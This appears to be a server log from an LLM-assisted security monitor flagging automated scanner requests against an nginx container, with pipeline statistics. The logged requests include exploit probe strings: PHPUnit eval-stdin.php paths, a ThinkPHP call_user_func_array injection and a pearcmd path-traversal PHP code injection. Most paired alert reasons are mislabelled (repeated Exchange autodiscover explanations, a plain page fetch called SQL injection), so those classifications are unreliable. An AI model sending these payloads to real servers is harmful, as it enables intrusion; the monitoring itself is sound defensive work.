Mar 20 14:53:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:24.866666 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to PHPunit test file paths (eval-stdin.php) commonly targeted in exploitation attempts; indicates probing for vulnerable components. Line=2026-03-20T14:53:24.866395050Z 2026/03/20 14:53:24 [error] 422#422: *755068 open() "/usr/share/nginx/default/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct...
Mar 20 14:53:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:24.866729 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:24.866573468Z 194.163.183.223 - - [20/Mar/2026:14:53:24 +0000] "54.200.221.0" "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "...
Mar 20 14:53:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:25.197655 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Probe-like request targeting phpunit path (eval-stdin.php) suggests attempted exploitation or vulnerability scanning. Line=2026-03-20T14:53:25.197275453Z 2026/03/20 14:53:25 [error] 422#422: *755068 open() "/usr/share/nginx/default/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo...
Mar 20 14:53:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:25.197770 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:25.197573174Z 194.163.183.223 - - [20/Mar/2026:14:53:25 +0000] "54.200.221.0" "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-...
Mar 20 14:53:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:25.671568 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a PHPUnit file path is commonly associated with automated probes for known vulnerabilities; not successful but warrants attention. Line=2026-03-20T14:53:25.671278040Z 2026/03/20 14:53:25 [error] 422#422: *755068 open() "/usr/share/nginx/default/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or dire...
Mar 20 14:53:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:25.671648 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:25.671453697Z 194.163.183.223 - - [20/Mar/2026:14:53:25 +0000] "54.200.221.0" "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http"...
Mar 20 14:53:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:26.189751 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit tooling path under /vendor/phpunit/phpunit, a common vector for exploiting PHP applications. The log shows an error opening a potentially sensitive file, indicating probing activity. Line=2026-03-20T14:53:26.189295991Z 2026/03/20 14:53:26 [error] 422#422: *755068 open() "/usr/share/nginx/default/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 14:53:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:26.189827 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:26.189460630Z 194.163.183.223 - - [20/Mar/2026:14:53:26 +0000] "54.200.221.0" "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:26.668551 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request appears to target a phpunit path that is commonly exploited to locate sensitive test infrastructure; the error shows a missing file, which may indicate probing or attempted access to restricted resources. Line=2026-03-20T14:53:26.668249206Z 2026/03/20 14:53:26 [error] 422#422: *755068 open() "/usr/share/nginx/default/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo...
Mar 20 14:53:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:26.668627 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:26.668342632Z 194.163.183.223 - - [20/Mar/2026:14:53:26 +0000] "54.200.221.0" "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-...
Mar 20 14:53:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:27.119911 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to a PHP unit test file (eval-stdin.php) under the cms/vendor/phpunit path suggests probing for phpunit exploit vectors; common in automated vulnerability scans. Line=2026-03-20T14:53:27.119626603Z 2026/03/20 14:53:27 [error] 422#422: *755068 open() "/usr/share/nginx/default/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 14:53:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:27.120087 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:27.119754339Z 194.163.183.223 - - [20/Mar/2026:14:53:27 +0000] "54.200.221.0" "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:27.472249 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path commonly abused in automated attacks; indicates probing for vulnerable PHP unit files. Line=2026-03-20T14:53:27.471981302Z 2026/03/20 14:53:27 [error] 422#422: *755068 open() "/usr/share/nginx/default/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 14:53:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:27.472324 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:27.472141009Z 194.163.183.223 - - [20/Mar/2026:14:53:27 +0000] "54.200.221.0" "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:27.772338 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Probe-like access to phpunit path in nginx error log; indicates potential vulnerability scan Line=2026-03-20T14:53:27.772009692Z 2026/03/20 14:53:27 [error] 422#422: *755068 open() "/usr/share/nginx/default/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct...
Mar 20 14:53:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:27.772418 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:27.772138816Z 194.163.183.223 - - [20/Mar/2026:14:53:27 +0000] "54.200.221.0" "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "...
Mar 20 14:53:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:28.072644 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a known phpunit path may indicate probing for local code execution vulnerabilities. Line=2026-03-20T14:53:28.072300209Z 2026/03/20 14:53:28 [error] 422#422: *755068 open() "/usr/share/nginx/default/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direc...
Mar 20 14:53:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:28.072899 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:28.072717181Z 194.163.183.223 - - [20/Mar/2026:14:53:28 +0000] "54.200.221.0" "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" ...
Mar 20 14:53:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:28.461594 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit path suggests probing for known PHP unit vulnerabilities. Line=2026-03-20T14:53:28.461203690Z 2026/03/20 14:53:28 [error] 422#422: *755068 open() "/usr/share/nginx/default/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo...
Mar 20 14:53:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:28.461680 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:28.461328939Z 194.163.183.223 - - [20/Mar/2026:14:53:28 +0000] "54.200.221.0" "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-...
Mar 20 14:53:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:28.861927 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx error shows an attempt to access a PHP unit test file (phpunit) which is uncommon in normal traffic and could indicate probing for test artifacts. Line=2026-03-20T14:53:28.861658450Z 2026/03/20 14:53:28 [error] 422#422: *755068 open() "/usr/share/nginx/default/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such fil...
Mar 20 14:53:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:28.861984 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:28.861752753Z 194.163.183.223 - - [20/Mar/2026:14:53:28 +0000] "54.200.221.0" "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredt...
Mar 20 14:53:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:29.384989 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to phpunit utility file under /panel/vendor/phpunit/phpunit is a common target for PHP unit testing tool probes; the error shows missing file but indicates an attempted access to a sensitive path. Line=2026-03-20T14:53:29.384655656Z 2026/03/20 14:53:29 [error] 422#422: *755068 open() "/usr/share/nginx/default/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct...
Mar 20 14:53:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:29.385057 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:29.384792691Z 194.163.183.223 - - [20/Mar/2026:14:53:29 +0000] "54.200.221.0" "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "...
Mar 20 14:53:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:29.808394 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit tooling path (eval-stdin.php) which is a common probe for RCE in PHP environments; indicates a potential attempt to abuse known tooling. Line=2026-03-20T14:53:29.807936367Z 2026/03/20 14:53:29 [error] 422#422: *755068 open() "/usr/share/nginx/default/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direc...
Mar 20 14:53:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:29.808461 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:29.807995149Z 194.163.183.223 - - [20/Mar/2026:14:53:29 +0000] "54.200.221.0" "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" ...
Mar 20 14:53:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:30.236931 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit eval-stdin.php path suggests probing for PHP unit-related vulnerability (potential LFI/RCE). Line=2026-03-20T14:53:30.236701848Z 2026/03/20 14:53:30 [error] 422#422: *755068 open() "/usr/share/nginx/default/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo...
Mar 20 14:53:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:30.237021 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:30.236806185Z 194.163.183.223 - - [20/Mar/2026:14:53:30 +0000] "54.200.221.0" "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-...
Mar 20 14:53:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:30.775024 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a PHP unit test file path that does not exist suggests probing for phpunit exposure; not definitive compromise but warrants alert. Line=2026-03-20T14:53:30.774709412Z 2026/03/20 14:53:30 [error] 422#422: *755068 open() "/usr/share/nginx/default/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director...
Mar 20 14:53:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:30.775090 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:30.774808481Z 194.163.183.223 - - [20/Mar/2026:14:53:30 +0000] "54.200.221.0" "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:31.311811 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an attempted PHP thinkphp injection payload in the request URL targeting an index.php file, indicative of an exploit attempt. Line=2026-03-20T14:53:31.311505564Z 2026/03/20 14:53:31 [error] 422#422: *755068 open() "/usr/share/nginx/default/index.php" failed (2: No such file or directory), client: 194.163.183.223, server: _, reque...
Mar 20 14:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:31.311864 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:31.311579009Z 194.163.183.223 - - [20/Mar/2026:14:53:31 +0000] "54.200.221.0" "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1...
Mar 20 14:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:31.938496 [observer] Pipeline: processed=6602 pattern_hits=6180 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:31.938526 [observer] Patterns: hash=6166 prefix=14 regex=0 contains=0 deny=120 alert=598 suppress=0 misses=422
Mar 20 14:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:31.939299 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Evidence of an attempted exploit via a crafted request to index.php (thinkphp vulnerability pattern) leading to a file-not-found error. No evidence of success; still suspicious and warrants monitoring. Line=2026-03-20T14:53:31.939029032Z 2026/03/20 14:53:31 [error] 422#422: *755068 open() "/usr/share/nginx/default/public/index.php" failed (2: No such file or directory), client: 194.163.183.223, server: _...
Mar 20 14:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:31.939377 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:31.939139963Z 194.163.183.223 - - [20/Mar/2026:14:53:31 +0000] "54.200.221.0" "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5...
Mar 20 14:53:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:32.406842 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted local file access and PHP code injection via crafted request to index.php with path traversal parameters Line=2026-03-20T14:53:32.406579150Z 2026/03/20 14:53:32 [error] 422#422: *755068 open() "/usr/share/nginx/default/index.php" failed (2: No such file or directory), client: 194.163.183.223, server: _, reque...
Mar 20 14:53:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:32.406924 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:32.406735202Z 194.163.183.223 - - [20/Mar/2026:14:53:32 +0000] "54.200.221.0" "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22h...
Mar 20 14:53:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:32.853045 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Detected a likely path traversal attempt in the request parameter (../../../../../../../../tmp/index1) targeting index.php, which is a common attacker technique to access restricted files. Line=2026-03-20T14:53:32.852821287Z 2026/03/20 14:53:32 [error] 422#422: *755068 open() "/usr/share/nginx/default/index.php" failed (2: No such file or directory), client: 194.163.183.223, server: _, reque...
Mar 20 14:53:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:32.853110 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:32.852993762Z 194.163.183.223 - - [20/Mar/2026:14:53:32 +0000] "54.200.221.0" "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:53:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:33.308396 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=External client attempted to access /containers/json on nginx, which is a common Docker API probe indicating potential Docker API exposure or reconnaissance. Line=2026-03-20T14:53:33.308078791Z 2026/03/20 14:53:33 [error] 422#422: *755068 open() "/usr/share/nginx/default/containers/json" failed (2: No such file or directory), client: 194.163.183.223, server: _,...
Mar 20 14:53:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:53:33.308451 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:53:33.308194300Z 194.163.183.223 - - [20/Mar/2026:14:53:33 +0000] "54.200.221.0" "GET /containers/json HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 14:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:54:01.959017 [observer] Pipeline: processed=6613 pattern_hits=6191 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:54:01.959089 [observer] Patterns: hash=6177 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:54:31.953368 [observer] Pipeline: processed=6615 pattern_hits=6193 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:54:31.953404 [observer] Patterns: hash=6179 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:55:01.943008 [observer] Pipeline: processed=6619 pattern_hits=6197 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:55:01.943208 [observer] Patterns: hash=6183 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:55:31.936800 [observer] Pipeline: processed=6621 pattern_hits=6199 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:55:31.936832 [observer] Patterns: hash=6185 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:56:01.967042 [observer] Pipeline: processed=6625 pattern_hits=6203 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:56:01.967074 [observer] Patterns: hash=6189 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:56:31.948844 [observer] Pipeline: processed=6627 pattern_hits=6205 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:56:31.948875 [observer] Patterns: hash=6191 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:57:01.948757 [observer] Pipeline: processed=6630 pattern_hits=6208 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:57:01.948787 [observer] Patterns: hash=6194 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:57:31.938343 [observer] Pipeline: processed=6633 pattern_hits=6211 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:57:31.938367 [observer] Patterns: hash=6197 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:58:01.974740 [observer] Pipeline: processed=6635 pattern_hits=6213 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:58:01.975138 [observer] Patterns: hash=6199 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:58:31.938543 [observer] Pipeline: processed=6641 pattern_hits=6219 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:58:31.938577 [observer] Patterns: hash=6205 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:59:01.942872 [observer] Pipeline: processed=6643 pattern_hits=6221 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:59:01.942900 [observer] Patterns: hash=6207 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:59:31.938526 [observer] Pipeline: processed=6647 pattern_hits=6225 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:59:31.938552 [observer] Patterns: hash=6211 prefix=14 regex=0 contains=0 deny=126 alert=600 suppress=0 misses=422
Mar 20 14:59:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:59:57.448192 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 14:59:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:59:57.448238 [analyzer] Source hint mismatch: LLM says "nginx/access", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 15:00:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:00:00.580805 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:00:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:00:00.580850 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 15:00:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:00:00.580922 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=SQL injection attempt detected in the query string (DROP TABLE) from client IP. Line=2026-03-20T14:59:52.250202618Z 74.7.242.2 - - [20/Mar/2026:14:59:52 +0000] "api.admin.kovicloud.com" "GET / HTTP/2.0" 200 34020 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTB...
Mar 20 15:00:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:00:02.081278 [observer] Pipeline: processed=6652 pattern_hits=6228 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:00:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:00:02.082534 [observer] Patterns: hash=6214 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:00:31.938758 [observer] Pipeline: processed=6655 pattern_hits=6231 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:00:31.938790 [observer] Patterns: hash=6217 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:01:01.965140 [observer] Pipeline: processed=6658 pattern_hits=6234 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:01:01.965189 [observer] Patterns: hash=6220 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:01:31.937631 [observer] Pipeline: processed=6660 pattern_hits=6236 llm_calls=424 llm_errors=3 learned=5
